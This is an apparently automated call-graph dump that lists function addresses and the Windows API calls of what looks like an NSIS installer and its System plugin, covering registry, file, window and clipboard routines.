4963->4972 4967 40403f 18 API calls 4964->4967 4965->4951 4968 404605 CoTaskMemFree 4965->4968 4969 404693 4966->4969 4970 40456c 4967->4970 4971 405938 3 API calls 4968->4971 5008 405fa0 lstrcpynA 4969->5008 5006 404074 SendMessageA 4970->5006 4974 404612 4971->4974 4972->4952 4977 404649 SetDlgItemTextA 4974->4977 4981 405fc2 17 API calls 4974->4981 4976 404572 4979 406338 5 API calls 4976->4979 4977->4951 4978 4046aa 4980 406338 5 API calls 4978->4980 4979->4955 4988 4046b1 4980->4988 4982 404631 lstrcmpiA 4981->4982 4982->4977 4985 404642 lstrcatA 4982->4985 4983 4046ed 5009 405fa0 lstrcpynA 4983->5009 4985->4977 4986 4046f4 4987 4059d1 4 API calls 4986->4987 4989 4046fa GetDiskFreeSpaceA 4987->4989 4988->4983 4992 40597f 2 API calls 4988->4992 4994 404745 4988->4994 4991 40471e MulDiv 4989->4991 4989->4994 4991->4994 4992->4988 4993 4047b6 4996 4047d9 4993->4996 4998 40140b 2 API calls 4993->4998 4994->4993 4995 40494d 20 API calls 4994->4995 4997 4047a3 4995->4997 5010 404061 KiUserCallbackDispatcher 4996->5010 4999 4047b8 SetDlgItemTextA 4997->4999 5000 4047a8 4997->5000 4998->4996 4999->4993 5003 404888 20 API calls 5000->5003 5002 4047f5 5002->4954 5011 40442a 5002->5011 5003->4993 5005->4949 5006->4976 5007->4961 5008->4978 5009->4986 5010->5002 5012 404438 5011->5012 5013 40443d SendMessageA 5011->5013 5012->5013 5013->4954 5014 6e131000 5017 6e13101b 5014->5017 5024 6e1314bb 5017->5024 5019 6e131020 5020 6e131027 GlobalAlloc 5019->5020 5021 6e131024 5019->5021 5020->5021 5022 6e1314e2 3 API calls 5021->5022 5023 6e131019 5022->5023 5026 6e1314c1 5024->5026 5025 6e1314c7 5025->5019 5026->5025 5027 6e1314d3 GlobalFree 5026->5027 5027->5019 5028 4026d4 5029 4026da 5028->5029 5030 4026de FindNextFileA 5029->5030 5032 4026f0 5029->5032 5031 40272f 5030->5031 5030->5032 5034 405fa0 lstrcpynA 5031->5034 5034->5032 4715 4023d6 4716 402acb 17 API calls 4715->4716 4717 4023e8 4716->4717 4718 402acb 17 API calls 4717->4718 4719 4023f2 4718->4719 4732 402b5b 4719->4732 4722 402427 4726 402aa9 17 API calls 4722->4726 4728 402433 4722->4728 4723 402acb 17 API calls 4725 402420 lstrlenA 4723->4725 4724 40271c 4725->4722 4726->4728 4727 402452 RegSetValueExA 4730 402468 RegCloseKey 4727->4730 4728->4727 4729 402f9c 31 API calls 4728->4729 4729->4727 4730->4724 4733 402b76 4732->4733 4736 405e54 4733->4736 4737 405e63 4736->4737 4738 402402 4737->4738 4739 405e6e RegCreateKeyExA 4737->4739 4738->4722 4738->4723 4738->4724 4739->4738 4740 4014d6 4741 402aa9 17 API calls 4740->4741 4742 4014dc Sleep 4741->4742 4744 402957 4742->4744 4745 401759 4746 402acb 17 API calls 4745->4746 4747 401760 4746->4747 4748 401786 4747->4748 4749 40177e 4747->4749 4786 405fa0 lstrcpynA 4748->4786 4785 405fa0 lstrcpynA 4749->4785 4752 401784 4756 40620a 5 API calls 4752->4756 4753 401791 4754 405938 3 API calls 4753->4754 4755 401797 lstrcatA 4754->4755 4755->4752 4763 4017a3 4756->4763 4757 4017e4 4759 405b14 2 API calls 4757->4759 4758 4062a3 2 API calls 4758->4763 4759->4763 4761 4017ba CompareFileTime 4761->4763 4762 40187e 4764 4050c7 24 API calls 4762->4764 4763->4757 4763->4758 4763->4761 4763->4762 4766 405fa0 lstrcpynA 4763->4766 4772 405fc2 17 API calls 4763->4772 4780 4056bc MessageBoxIndirectA 4763->4780 4781 401855 4763->4781 4784 405b39 GetFileAttributesA CreateFileA 4763->4784 4767 401888 4764->4767 4765 4050c7 24 API calls 4783 40186a 4765->4783 4766->4763 4768 402f9c 31 API calls 4767->4768 4769 40189b 4768->4769 4770 4018af SetFileTime 4769->4770 4771 4018c1 FindCloseChangeNotification 4769->4771 4770->4771 4773 4018d2 4771->4773 4771->4783 4772->4763 4774 4018d7 4773->4774 4775 4018ea 4773->4775 4776 405fc2 17 API calls 4774->4776 4777 405fc2 17 API calls 4775->4777 4778 4018df lstrcatA 4776->4778 4779 4018f2 4777->4779 4778->4779 4782 4056bc MessageBoxIndirectA 4779->4782 4780->4763 4781->4765 4781->4783 4782->4783 4784->4763 4785->4752 4786->4753 5035 401659 5036 402acb 17 API calls 5035->5036 5037 40165f 5036->5037 5038 4062a3 2 API calls 5037->5038 5039 401665 5038->5039 5040 401959 5041 402aa9 17 API calls 5040->5041 5042 401960 5041->5042 5043 402aa9 17 API calls 5042->5043 5044 40196d 5043->5044 5045 402acb 17 API calls 5044->5045 5046 401984 lstrlenA 5045->5046 5048 401994 5046->5048 5047 4019d4 5048->5047 5052 405fa0 lstrcpynA 5048->5052 5050 4019c4 5050->5047 5051 4019c9 lstrlenA 5050->5051 5051->5047 5052->5050 5053 401cda 5054 402aa9 17 API calls 5053->5054 5055 401ce0 IsWindow 5054->5055 5056 401a0e 5055->5056 5057 401a5e 5058 402aa9 17 API calls 5057->5058 5059 401a67 5058->5059 5060 402aa9 17 API calls 5059->5060 5061 401a0e 5060->5061 5062 401f61 5063 402acb 17 API calls 5062->5063 5064 401f68 5063->5064 5065 406338 5 API calls 5064->5065 5066 401f77 5065->5066 5067 401ff7 5066->5067 5068 401f8f GlobalAlloc 5066->5068 5068->5067 5069 401fa3 5068->5069 5070 406338 5 API calls 5069->5070 5071 401faa 5070->5071 5072 406338 5 API calls 5071->5072 5073 401fb4 5072->5073 5073->5067 5077 405efe wsprintfA 5073->5077 5075 401feb 5078 405efe wsprintfA 5075->5078 5077->5075 5078->5067 5079 402561 5080 402acb 17 API calls 5079->5080 5081 402568 5080->5081 5084 405b39 GetFileAttributesA CreateFileA 5081->5084 5083 402574 5084->5083 5085 401563 5086 4028ff 5085->5086 5089 405efe wsprintfA 5086->5089 5088 402904 5089->5088 5090 401b63 5091 401b70 5090->5091 5092 401bb4 5090->5092 5097 401b87 5091->5097 5099 401bf8 5091->5099 5093 401bb8 5092->5093 5094 401bdd GlobalAlloc 5092->5094 5101 4022e7 5093->5101 5111 405fa0 lstrcpynA 5093->5111 5096 405fc2 17 API calls 5094->5096 5095 405fc2 17 API calls 5102 4022e1 5095->5102 5096->5099 5109 405fa0 lstrcpynA 5097->5109 5099->5095 5099->5101 5105 4056bc MessageBoxIndirectA 5102->5105 5103 401bca GlobalFree 5103->5101 5104 401b96 5110 405fa0 lstrcpynA 5104->5110 5105->5101 5107 401ba5 5112 405fa0 lstrcpynA 5107->5112 5109->5104 5110->5107 5111->5103 5112->5101 5113 6e131837 5114 6e13185a 5113->5114 5115 6e13188a GlobalFree 5114->5115 5116 6e13189c 5114->5116 5115->5116 5117 6e131266 2 API calls 5116->5117 5118 6e131a1e GlobalFree GlobalFree 5117->5118 4055 4024e5 4056 402b0b 17 API calls 4055->4056 4057 4024ef 4056->4057 4066 402aa9 4057->4066 4059 4024f8 4060 40271c 4059->4060 4061 402513 RegEnumKeyA 4059->4061 4062 40251f RegEnumValueA 4059->4062 4063 40253b RegCloseKey 4061->4063 4062->4063 4064 402534 4062->4064 4063->4060 4064->4063 4067 405fc2 17 API calls 4066->4067 4068 402abe 4067->4068 4068->4059 5119 40166a 5120 402acb 17 API calls 5119->5120 5121 401671 5120->5121 5122 402acb 17 API calls 5121->5122 5123 40167a 5122->5123 5124 402acb 17 API calls 5123->5124 5125 401683 MoveFileA 5124->5125 5126 401696 5125->5126 5132 40168f 5125->5132 5128 4062a3 2 API calls 5126->5128 5130 402242 5126->5130 5127 401423 24 API calls 5127->5130 5129 4016a5 5128->5129 5129->5130 5131 405d7f 36 API calls 5129->5131 5131->5132 5132->5127 4183 403b6b 4184 403b83 4183->4184 4185 403cbe 4183->4185 4184->4185 4186 403b8f 4184->4186 4187 403d0f 4185->4187 4188 403ccf GetDlgItem GetDlgItem 4185->4188 4190 403b9a SetWindowPos 4186->4190 4191 403bad 4186->4191 4189 403d69 4187->4189 4197 401389 2 API calls 4187->4197 4192 40403f 18 API calls 4188->4192 4193 40408b SendMessageA 4189->4193 4213 403cb9 4189->4213 4190->4191 4194 403bb2 ShowWindow 4191->4194 4195 403bca 4191->4195 4196 403cf9 SetClassLongA 4192->4196 4225 403d7b 4193->4225 4194->4195 4198 403bd2 DestroyWindow 4195->4198 4199 403bec 4195->4199 4200 40140b 2 API calls 4196->4200 4203 403d41 4197->4203 4253 403fc8 4198->4253 4201 403bf1 SetWindowLongA 4199->4201 4202 403c02 4199->4202 4200->4187 4201->4213 4204 403cab 4202->4204 4205 403c0e GetDlgItem 4202->4205 4203->4189 4206 403d45 SendMessageA 4203->4206 4211 4040a6 8 API calls 4204->4211 4209 403c21 SendMessageA IsWindowEnabled 4205->4209 4210 403c3e 4205->4210 4206->4213 4207 40140b 2 API calls 4207->4225 4208 403fca DestroyWindow EndDialog 4208->4253 4209->4210 4209->4213 4215 403c4b 4210->4215 4217 403c92 SendMessageA 4210->4217 4218 403c5e 4210->4218 4227 403c43 4210->4227 4211->4213 4212 403ff9 ShowWindow 4212->4213 4214 405fc2 17 API calls 4214->4225 4215->4217 4215->4227 4216 404018 SendMessageA 4219 403c79 4216->4219 4217->4204 4220 403c66 4218->4220 4221 403c7b 4218->4221 4219->4204 4260 40140b 4220->4260 4223 40140b 2 API calls 4221->4223 4222 40403f 18 API calls 4222->4225 4226 403c82 4223->4226 4225->4207 4225->4208 4225->4213 4225->4214 4225->4222 4228 40403f 18 API calls 4225->4228 4244 403f0a DestroyWindow 4225->4244 4226->4204 4226->4227 4227->4216 4229 403df6 GetDlgItem 4228->4229 4230 403e13 ShowWindow KiUserCallbackDispatcher 4229->4230 4231 403e0b 4229->4231 4254 404061 KiUserCallbackDispatcher 4230->4254 4231->4230 4233 403e3d EnableWindow 4238 403e51 4233->4238 4234 403e56 GetSystemMenu EnableMenuItem SendMessageA 4235 403e86 SendMessageA 4234->4235 4234->4238 4235->4238 4238->4234 4255 404074 SendMessageA 4238->4255 4256 403b4c 4238->4256 4259 405fa0 lstrcpynA 4238->4259 4240 403eb5 lstrlenA 4241 405fc2 17 API calls 4240->4241 4242 403ec6 SetWindowTextA 4241->4242 4243 401389 2 API calls 4242->4243 4243->4225 4245 403f24 CreateDialogParamA 4244->4245 4244->4253 4246 403f57 4245->4246 4245->4253 4247 40403f 18 API calls 4246->4247 4248 403f62 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4247->4248 4249 401389 2 API calls 4248->4249 4250 403fa8 4249->4250 4250->4213 4251 403fb0 ShowWindow 4250->4251 4252 40408b SendMessageA 4251->4252 4252->4253 4253->4212 4253->4213 4254->4233 4255->4238 4257 405fc2 17 API calls 4256->4257 4258 403b5a SetWindowTextA 4257->4258 4258->4238 4259->4240 4261 401389 2 API calls 4260->4261 4262 401420 4261->4262 4262->4227 5133 6e131638 5134 6e131667 5133->5134 5135 6e131a98 18 API calls 5134->5135 5136 6e13166e 5135->5136 5137 6e131681 5136->5137 5138 6e131675 5136->5138 5139 6e13168b 5137->5139 5140 6e1316a8 5137->5140 5141 6e131266 2 API calls 5138->5141 5143 6e1314e2 3 API calls 5139->5143 5144 6e1316d2 5140->5144 5145 6e1316ae 5140->5145 5142 6e13167f 5141->5142 5147 6e131690 5143->5147 5146 6e1314e2 3 API calls 5144->5146 5148 6e131559 3 API calls 5145->5148 5146->5142 5149 6e131559 3 API calls 5147->5149 5150 6e1316b3 5148->5150 5151 6e131696 5149->5151 5152 6e131266 2 API calls 5150->5152 5153 6e131266 2 API calls 5151->5153 5154 6e1316b9 GlobalFree 5152->5154 5155 6e13169c GlobalFree 5153->5155 5154->5142 5156 6e1316cd GlobalFree 5154->5156 5155->5142 5156->5142 5157 4019ed 5158 402acb 17 API calls 5157->5158 5159 4019f4 5158->5159 5160 402acb 17 API calls 5159->5160 5161 4019fd 5160->5161 5162 401a04 lstrcmpiA 5161->5162 5163 401a16 lstrcmpA 5161->5163 5164 401a0a 5162->5164 5163->5164 5165 6e13103d 5166 6e13101b 5 API calls 5165->5166 5167 6e131056 5166->5167 4671 40156f 4672 401586 4671->4672 4673 40157f ShowWindow 4671->4673 4674 401594 ShowWindow 4672->4674 4675 402957 4672->4675 4673->4672 4674->4675 5168 6e132ba3 5169 6e132bbb 5168->5169 5170 6e131534 2 API calls 5169->5170 5171 6e132bd6 5170->5171 4703 402473 4704 402b0b 17 API calls 4703->4704 4705 40247d 4704->4705 4706 402acb 17 API calls 4705->4706 4707 402486 4706->4707 4708 402490 RegQueryValueExA 4707->4708 4713 40271c 4707->4713 4709 4024b0 4708->4709 4710 4024b6 RegCloseKey 4708->4710 4709->4710 4714 405efe wsprintfA 4709->4714 4710->4713 4714->4710 5172 4014f4 SetForegroundWindow 5173 402957 5172->5173 5174 404175 lstrcpynA lstrlenA 5175 401cfb 5176 402aa9 17 API calls 5175->5176 5177 401d02 5176->5177 5178 402aa9 17 API calls 5177->5178 5179 401d0e GetDlgItem 5178->5179 5180 40257d 5179->5180 4807 4022fc 4808 402304 4807->4808 4810 40230a 4807->4810 4809 402acb 17 API calls 4808->4809 4809->4810 4811 402acb 17 API calls 4810->4811 4812 40231a 4810->4812 4811->4812 4813 402328 4812->4813 4814 402acb 17 API calls 4812->4814 4815 402acb 17 API calls 4813->4815 4814->4813 4816 402331 WritePrivateProfileStringA 4815->4816 5181 402c7c 5182 402ca4 5181->5182 5183 402c8b SetTimer 5181->5183 5184 402cf9 5182->5184 5185 402cbe MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5182->5185 5183->5182 5185->5184 5186 4018fd 5187 401934 5186->5187 5188 402acb 17 API calls 5187->5188 5189 401939 5188->5189 5190 405768 67 API calls 5189->5190 5191 401942 5190->5191 5192 4026fe 5193 402acb 17 API calls 5192->5193 5194 402705 FindFirstFileA 5193->5194 5195 402728 5194->5195 5199 402718 5194->5199 5197 40272f 5195->5197 5200 405efe wsprintfA 5195->5200 5201 405fa0 lstrcpynA 5197->5201 5200->5197 5201->5199 5202 401000 5203 401037 BeginPaint GetClientRect 5202->5203 5205 40100c DefWindowProcA 5202->5205 5206 4010f3 5203->5206 5207 401179 5205->5207 5208 401073 CreateBrushIndirect FillRect DeleteObject 5206->5208 5209 4010fc 5206->5209 5208->5206 5210 401102 CreateFontIndirectA 5209->5210 5211 401167 EndPaint 5209->5211 5210->5211 5212 401112 6 API calls 5210->5212 5211->5207 5212->5211 5213 401900 5214 402acb 17 API calls 5213->5214 5215 401907 5214->5215 5216 4056bc MessageBoxIndirectA 5215->5216 5217 401910 5216->5217 3814 402381 3815 4023b3 3814->3815 3816 402388 3814->3816 3818 402acb 17 API calls 3815->3818 3826 402b0b 3816->3826 3820 4023ba 3818->3820 3831 402b89 3820->3831 3822 402399 3824 402acb 17 API calls 3822->3824 3823 4023c7 3825 4023a0 RegDeleteValueA RegCloseKey 3824->3825 3825->3823 3827 402acb 17 API calls 3826->3827 3828 402b22 3827->3828 3829 405e26 RegOpenKeyExA 3828->3829 3830 40238f 3829->3830 3830->3822 3830->3823 3832 402b95 3831->3832 3833 402b9c 3831->3833 3832->3823 3833->3832 3835 402bcd 3833->3835 3836 405e26 RegOpenKeyExA 3835->3836 3837 402bfb 3836->3837 3838 402c75 3837->3838 3845 402bff 3837->3845 3838->3832 3839 402c21 RegEnumKeyA 3840 402c38 RegCloseKey 3839->3840 3839->3845 3848 406338 GetModuleHandleA 3840->3848 3841 402c59 RegCloseKey 3841->3838 3843 402bcd 6 API calls 3843->3845 3845->3839 3845->3840 3845->3841 3845->3843 3846 402c69 RegDeleteKeyA 3846->3838 3847 402c4c 3847->3838 3849 406354 3848->3849 3850 40635e GetProcAddress 3848->3850 3854 4062ca GetSystemDirectoryA 3849->3854 3852 402c48 3850->3852 3852->3846 3852->3847 3853 40635a 3853->3850 3853->3852 3855 4062ec wsprintfA LoadLibraryExA 3854->3855 3855->3853 5218 401502 5219 40150a 5218->5219 5221 40151d 5218->5221 5220 402aa9 17 API calls 5219->5220 5220->5221 5222 6e1315d1 5223 6e1314bb GlobalFree 5222->5223 5225 6e1315e9 5223->5225 5224 6e13162f GlobalFree 5225->5224 5226 6e131604 5225->5226 5227 6e13161b VirtualFree 5225->5227 5226->5224 5227->5224 3857 402003 3858 402015 3857->3858 3859 4020c3 3857->3859 3860 402acb 17 API calls 3858->3860 3861 401423 24 API calls 3859->3861 3862 40201c 3860->3862 3868 402242 3861->3868 3863 402acb 17 API calls 3862->3863 3864 402025 3863->3864 3865 40203a LoadLibraryExA 3864->3865 3866 40202d GetModuleHandleA 3864->3866 3865->3859 3867 40204a GetProcAddress 3865->3867 3866->3865 3866->3867 3869 402096 3867->3869 3870 402059 3867->3870 3923 4050c7 3869->3923 3872 402061 3870->3872 3873 402078 3870->3873 3920 401423 3872->3920 3878 6e1316db 3873->3878 3874 402069 3874->3868 3876 4020b7 FreeLibrary 3874->3876 3876->3868 3879 6e13170b 3878->3879 3934 6e131a98 3879->3934 3881 6e131712 3882 6e131834 3881->3882 3883 6e131723 3881->3883 3884 6e13172a 3881->3884 3882->3874 3982 6e13226f 3883->3982 3966 6e1322b1 3884->3966 3889 6e131770 3995 6e132498 3889->3995 3890 6e13178e 3895 6e131794 3890->3895 3896 6e1317dc 3890->3896 3891 6e131740 3894 6e131746 3891->3894 3900 6e131751 3891->3900 3892 6e131759 3905 6e13174f 3892->3905 3992 6e132c83 3892->3992 3894->3905 3976 6e1329f8 3894->3976 4014 6e13156b 3895->4014 3898 6e132498 11 API calls 3896->3898 3903 6e1317cd 3898->3903 3899 6e131776 4006 6e131559 3899->4006 3986 6e132672 3900->3986 3911 6e131823 3903->3911 4020 6e13245e 3903->4020 3905->3889 3905->3890 3909 6e131757 3909->3905 3910 6e132498 11 API calls 3910->3903 3911->3882 3913 6e13182d GlobalFree 3911->3913 3913->3882 3917 6e13180f 3917->3911 4024 6e1314e2 wsprintfA 3917->4024 3918 6e131808 FreeLibrary 3918->3917 3921 4050c7 24 API calls 3920->3921 3922 401431 3921->3922 3922->3874 3924 4050e2 3923->3924 3933 405185 3923->3933 3925 4050ff lstrlenA 3924->3925 3926 405fc2 17 API calls 3924->3926 3927 405128 3925->3927 3928 40510d lstrlenA 3925->3928 3926->3925 3930 40513b 3927->3930 3931 40512e SetWindowTextA 3927->3931 3929 40511f lstrcatA 3928->3929 3928->3933 3929->3927 3932 405141 SendMessageA SendMessageA SendMessageA 3930->3932 3930->3933 3931->3930 3932->3933 3933->3874 4027 6e131215 GlobalAlloc 3934->4027 3936 6e131abc 4028 6e131215 GlobalAlloc 3936->4028 3938 6e131cde GlobalFree GlobalFree GlobalFree 3939 6e131cfb 3938->3939 3955 6e131d45 3938->3955 3940 6e1320b1 3939->3940 3947 6e131d10 3939->3947 3939->3955 3942 6e1320d3 GetModuleHandleA 3940->3942 3940->3955 3941 6e131b9b GlobalAlloc 3960 6e131ac7 3941->3960 3944 6e1320e4 LoadLibraryA 3942->3944 3945 6e1320f9 3942->3945 3943 6e131c04 GlobalFree 3943->3960 3944->3945 3944->3955 4035 6e1315c2 GetProcAddress 3945->4035 3946 6e131be6 lstrcpyA 3949 6e131bf0 lstrcpyA 3946->3949 3947->3955 4031 6e131224 3947->4031 3949->3960 3950 6e13214a 3952 6e132157 lstrlenA 3950->3952 3950->3955 4036 6e1315c2 GetProcAddress 3952->4036 3953 6e131f95 4034 6e131215 GlobalAlloc 3953->4034 3954 6e132011 3954->3955 3959 6e132055 lstrcpyA 3954->3959 3955->3881 3956 6e13210b 3956->3950 3964 6e132134 GetProcAddress 3956->3964 3959->3955 3960->3938 3960->3941 3960->3943 3960->3946 3960->3949 3960->3953 3960->3954 3960->3955 3961 6e131ed7 GlobalFree 3960->3961 3963 6e131224 2 API calls 3960->3963 4029 6e131534 GlobalSize GlobalAlloc 3960->4029 3961->3960 3963->3960 3964->3950 3965 6e131f9d 3965->3881 3974 6e1322ca 3966->3974 3967 6e131224 GlobalAlloc lstrcpynA 3967->3974 3969 6e132406 GlobalFree 3970 6e131730 3969->3970 3969->3974 3970->3891 3970->3892 3970->3905 3971 6e132378 GlobalAlloc MultiByteToWideChar 3972 6e1323c5 3971->3972 3973 6e1323a4 GlobalAlloc CLSIDFromString GlobalFree 3971->3973 3972->3969 4042 6e132606 3972->4042 3973->3969 3974->3967 3974->3969 3974->3971 3974->3972 4038 6e1312ad 3974->4038 3978 6e132a0a 3976->3978 3977 6e132aaf EnumWindows 3981 6e132acd 3977->3981 3978->3977 3980 6e132b99 3980->3905 4045 6e1329a4 3981->4045 3983 6e132284 3982->3983 3984 6e13228f GlobalAlloc 3983->3984 3985 6e131729 3983->3985 3984->3983 3985->3884 3990 6e1326a2 3986->3990 3987 6e132750 3989 6e132756 GlobalSize 3987->3989 3991 6e132760 3987->3991 3988 6e13273d GlobalAlloc 3988->3991 3989->3991 3990->3987 3990->3988 3991->3909 3993 6e132c8e 3992->3993 3994 6e132cce GlobalFree 3993->3994 4049 6e131215 GlobalAlloc 3995->4049 3997 6e1324a4 3998 6e132523 lstrcpynA 3997->3998 3999 6e132534 StringFromGUID2 WideCharToMultiByte 3997->3999 4000 6e132558 WideCharToMultiByte 3997->4000 4001 6e132579 wsprintfA 3997->4001 4002 6e13259d GlobalFree 3997->4002 4003 6e1325d7 GlobalFree 3997->4003 4004 6e131266 2 API calls 3997->4004 4050 6e1312d1 3997->4050 3998->3997 3999->3997 4000->3997 4001->3997 4002->3997 4003->3899 4004->3997 4054 6e131215 GlobalAlloc 4006->4054 4008 6e13155e 4009 6e13156b 2 API calls 4008->4009 4010 6e131568 4009->4010 4011 6e131266 4010->4011 4012 6e1312a8 GlobalFree 4011->4012 4013 6e13126f GlobalAlloc lstrcpynA 4011->4013 4012->3903 4013->4012 4015 6e131577 wsprintfA 4014->4015 4016 6e1315a4 lstrcpyA 4014->4016 4019 6e1315bd 4015->4019 4016->4019 4019->3910 4021 6e13246c 4020->4021 4023 6e1317ef 4020->4023 4022 6e132485 GlobalFree 4021->4022 4021->4023 4022->4021 4023->3917 4023->3918 4025 6e131266 2 API calls 4024->4025 4026 6e131503 4025->4026 4026->3911 4027->3936 4028->3960 4030 6e131552 4029->4030 4030->3960 4037 6e131215 GlobalAlloc 4031->4037 4033 6e131233 lstrcpynA 4033->3955 4034->3965 4035->3956 4036->3955 4037->4033 4039 6e1312b4 4038->4039 4040 6e131224 2 API calls 4039->4040 4041 6e1312cf 4040->4041 4041->3974 4043 6e132614 VirtualAlloc 4042->4043 4044 6e13266a 4042->4044 4043->4044 4044->3972 4046 6e1329af 4045->4046 4047 6e1329b4 GetLastError 4046->4047 4048 6e1329bf 4046->4048 4047->4048 4048->3980 4049->3997 4051 6e1312da 4050->4051 4052 6e1312f9 4050->4052 4051->4052 4053 6e1312e0 lstrcpyA 4051->4053 4052->3997 4053->4052 4054->4008 5228 402583 5229 402588 5228->5229 5230 40259c 5228->5230 5231 402aa9 17 API calls 5229->5231 5232 402acb 17 API calls 5230->5232 5234 402591 5231->5234 5233 4025a3 lstrlenA 5232->5233 5233->5234 5235 405be0 WriteFile 5234->5235 5236 4025c5 5234->5236 5235->5236 4069 405205 4070 4053b0 4069->4070 4071 405227 GetDlgItem GetDlgItem GetDlgItem 4069->4071 4073 4053e0 4070->4073 4074 4053b8 GetDlgItem CreateThread FindCloseChangeNotification 4070->4074 4115 404074 SendMessageA 4071->4115 4076 40540e 4073->4076 4077 4053f6 ShowWindow ShowWindow 4073->4077 4078 40542f 4073->4078 4074->4073 4138 405199 OleInitialize 4074->4138 4075 405297 4081 40529e GetClientRect GetSystemMetrics SendMessageA SendMessageA 4075->4081 4079 405416 4076->4079 4080 405469 4076->4080 4120 404074 SendMessageA 4077->4120 4124 4040a6 4078->4124 4083 405442 ShowWindow 4079->4083 4084 40541e 4079->4084 4080->4078 4090 405476 SendMessageA 4080->4090 4088 4052f0 SendMessageA SendMessageA 4081->4088 4089 40530c 4081->4089 4086 405462 4083->4086 4087 405454 4083->4087 4121 404018 4084->4121 4094 404018 SendMessageA 4086->4094 4093 4050c7 24 API calls 4087->4093 4088->4089 4095 405311 SendMessageA 4089->4095 4096 40531f 4089->4096 4092 40543b 4090->4092 4097 40548f CreatePopupMenu 4090->4097 4093->4086 4094->4080 4095->4096 4116 40403f 4096->4116 4098 405fc2 17 API calls 4097->4098 4100 40549f AppendMenuA 4098->4100 4102 4054d0 TrackPopupMenu 4100->4102 4103 4054bd GetWindowRect 4100->4103 4101 40532f 4104 405338 ShowWindow 4101->4104 4105 40536c GetDlgItem SendMessageA 4101->4105 4102->4092 4107 4054ec 4102->4107 4103->4102 4108 40535b 4104->4108 4109 40534e ShowWindow 4104->4109 4105->4092 4106 405393 SendMessageA SendMessageA 4105->4106 4106->4092 4110 40550b SendMessageA 4107->4110 4119 404074 SendMessageA 4108->4119 4109->4108 4110->4110 4111 405528 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4110->4111 4113 40554a SendMessageA 4111->4113 4113->4113 4114 40556c GlobalUnlock SetClipboardData CloseClipboard 4113->4114 4114->4092 4115->4075 4117 405fc2 17 API calls 4116->4117 4118 40404a SetDlgItemTextA 4117->4118 4118->4101 4119->4105 4120->4076 4122 404025 SendMessageA 4121->4122 4123 40401f 4121->4123 4122->4078 4123->4122 4125 4040be GetWindowLongA 4124->4125 4126 404169 4124->4126 4125->4126 4127 4040d3 4125->4127 4126->4092 4127->4126 4128 404100 GetSysColor 4127->4128 4129 404103 4127->4129 4128->4129 4130 404113 SetBkMode 4129->4130 4131 404109 SetTextColor 4129->4131 4132 404131 4130->4132 4133 40412b GetSysColor 4130->4133 4131->4130 4134 404142 4132->4134 4135 404138 SetBkColor 4132->4135 4133->4132 4134->4126 4136 404155 DeleteObject 4134->4136 4137 40415c CreateBrushIndirect 4134->4137 4135->4134 4136->4137 4137->4126 4145 40408b 4138->4145 4140 4051e3 4141 40408b SendMessageA 4140->4141 4143 4051f5 OleUninitialize 4141->4143 4142 4051bc 4142->4140 4148 401389 4142->4148 4146 4040a3 4145->4146 4147 404094 SendMessageA 4145->4147 4146->4142 4147->4146 4150 401390 4148->4150 4149 4013fe 4149->4142 4150->4149 4151 4013cb MulDiv SendMessageA 4150->4151 4151->4150 4162 402688 4163 40268f 4162->4163 4165 402904 4162->4165 4164 402aa9 17 API calls 4163->4164 4166 402696 4164->4166 4167 4026a5 SetFilePointer 4166->4167 4167->4165 4168 4026b5 4167->4168 4170 405efe wsprintfA 4168->4170 4170->4165 5237 401c0a 5238 402aa9 17 API calls 5237->5238 5239 401c11 5238->5239 5240 402aa9 17 API calls 5239->5240 5241 401c1e 5240->5241 5242 401c33 5241->5242 5243 402acb 17 API calls 5241->5243 5244 401c43 5242->5244 5245 402acb 17 API calls 5242->5245 5243->5242 5246 401c9a 5244->5246 5247 401c4e 5244->5247 5245->5244 5248 402acb 17 API calls 5246->5248 5249 402aa9 17 API calls 5247->5249 5250 401c9f 5248->5250 5251 401c53 5249->5251 5253 402acb 17 API calls 5250->5253 5252 402aa9 17 API calls 5251->5252 5254 401c5f 5252->5254 5255 401ca8 FindWindowExA 5253->5255 5256 401c8a SendMessageA 5254->5256 5257 401c6c SendMessageTimeoutA 5254->5257 5258 401cc6 5255->5258 5256->5258 5257->5258 5259 40448a 5260 4044c0 5259->5260 5261 40449a 5259->5261 5263 4040a6 8 API calls 5260->5263 5262 40403f 18 API calls 5261->5262 5265 4044a7 SetDlgItemTextA 5262->5265 5264 4044cc 5263->5264 5265->5260 5266 6e131058 5267 6e131074 5266->5267 5268 6e1310dc 5267->5268 5269 6e1314bb GlobalFree 5267->5269 5270 6e131091 5267->5270 5269->5270 5271 6e1314bb GlobalFree 5270->5271 5272 6e1310a1 5271->5272 5273 6e1310b1 5272->5273 5274 6e1310a8 GlobalSize 5272->5274 5275 6e1310c6 5273->5275 5276 6e1310b5 GlobalAlloc 5273->5276 5274->5273 5278 6e1310d1 GlobalFree 5275->5278 5277 6e1314e2 3 API calls 5276->5277 5277->5275 5278->5268 4271 40320c SetErrorMode GetVersion 4272 40324d 4271->4272 4273 403253 4271->4273 4274 406338 5 API calls 4272->4274 4275 4062ca 3 API calls 4273->4275 4274->4273 4276 403269 lstrlenA 4275->4276 4276->4273 4277 403278 4276->4277 4278 406338 5 API calls 4277->4278 4279 40327f 4278->4279 4280 406338 5 API calls 4279->4280 4281 403286 4280->4281 4282 406338 5 API calls 4281->4282 4283 403292 #17 OleInitialize SHGetFileInfoA 4282->4283 4361 405fa0 lstrcpynA 4283->4361 4286 4032de GetCommandLineA 4362 405fa0 lstrcpynA 4286->4362 4288 4032f0 4289 405963 CharNextA 4288->4289 4290 403319 CharNextA 4289->4290 4292 403329 4290->4292 4291 4033f3 4293 403406 GetTempPathA 4291->4293 4292->4291 4296 405963 CharNextA 4292->4296 4302 4033f5 4292->4302 4363 4031db 4293->4363 4295 40341e 4297 403422 GetWindowsDirectoryA lstrcatA 4295->4297 4298 403478 DeleteFileA 4295->4298 4296->4292 4299 4031db 12 API calls 4297->4299 4373 402d63 GetTickCount GetModuleFileNameA 4298->4373 4301 40343e 4299->4301 4301->4298 4304 403442 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4301->4304 4468 405fa0 lstrcpynA 4302->4468 4303 40348c 4305 403522 4303->4305 4308 403512 4303->4308 4312 405963 CharNextA 4303->4312 4307 4031db 12 API calls 4304->4307 4485 4036f4 4305->4485 4310 403470 4307->4310 4401 4037ce 4308->4401 4310->4298 4310->4305 4314 4034a7 4312->4314 4320 403552 4314->4320 4321 4034ed 4314->4321 4315 40365a 4317 403662 GetCurrentProcess OpenProcessToken 